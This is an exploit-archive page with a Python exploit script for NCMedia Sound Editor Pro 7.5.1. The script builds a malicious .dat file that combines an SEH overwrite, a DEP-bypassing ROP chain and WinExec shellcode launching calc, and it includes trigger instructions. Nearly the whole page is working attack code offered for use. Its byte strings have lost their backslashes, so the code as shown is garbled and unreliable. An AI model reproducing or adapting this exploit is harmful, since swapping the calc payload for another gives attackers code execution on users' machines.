[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP
# Published : 2012-10-03
# Author :
# Previous Title : ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow
# Next Title : Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP #
# Author: b33f - http://www.fuzzysecurity.com/ #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit) #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/ #
# Software: http://www.soundeditorpro.com/ #
# HOWTO: put the *.dat file in [USER]RoamingSound Editor Pro #
# open -> click "File" menu -> calc ;)) #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the #
# ROP-Chain as it was executed was "Oh no, not again"! #
#---------------------------------------------------------------------------#
import sys, socket, struct
file="MRUList201202.dat"
#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"... #
#--------------------------------------------------------------------------------------------------------------#
rop = struct.pack('<L',0x7c0126bc) # XCHG EAX,EBP # ADD AL,7C # RETN
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B | MOV VP -> ESI
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe] | JMP ESP -> EBP
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll] |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes) | Executable Size -> EBX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN ROP-NOP -> EDI
rop += struct.pack('<L',0x7c034e02) # ROP-NOP /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40 | newProtect -> EDX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN RW lpOldProtect -> ECX
rop += struct.pack('<L',0x7c049001) # lpOldProtect /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN NOP padding -> EAX
rop += struct.pack('<L',0x90909090) # NOP /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN | PUSHAD -> pwnd!!
#--------------------------------------------------------------------------------------------------------------#
#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
#----------------------------------
calc = (
"x31xD2" #
"x52" #
"x68x63x61x6Cx63" # Stack has arguments for
"x89xE6" # WinExec -> calc
"x52" #
"x56" ########
"x64x8Bx72x30" #
"x8Bx76x0C" #
"x8Bx76x0C" # Found Kernel32
"xAD" # base address
"x8Bx30" #
"x8Bx7Ex18" ########
"x8Bx5Fx3C" # Found export table offset
"x8Bx5Cx1Fx78" ########
"x8Bx74x1Fx20" # Found export names table
"x01xFE" ########
"x8Bx4Cx1Fx24" # Found export ordinals table
"x01xF9" ########
"x42" #
"xAD" # Found WinExec ordinal
"x81x3Cx07x57x69x6Ex45" #
"x75xF5" ########
"x0FxB7x54x51xFE" #
"x8Bx74x1Fx1C" #
"x01xFE" # Pop calc ;))
"x03x3Cx96" #
"xFFxD7") #
#----------------------------------
# badchars -> 'x00x0dx0a'
# 0x0040e02a {pivot 1092} # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
b00m = "x90"*10 + calc
poc = "x02x4Ex03x7C"*61 + rop + b00m + "x41"*(3880-len(rop + b00m)) + "x2AxE0x40x00"
try:
print "[*] Creating exploit file...n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!"
except:
print "[!] Error while creating file!"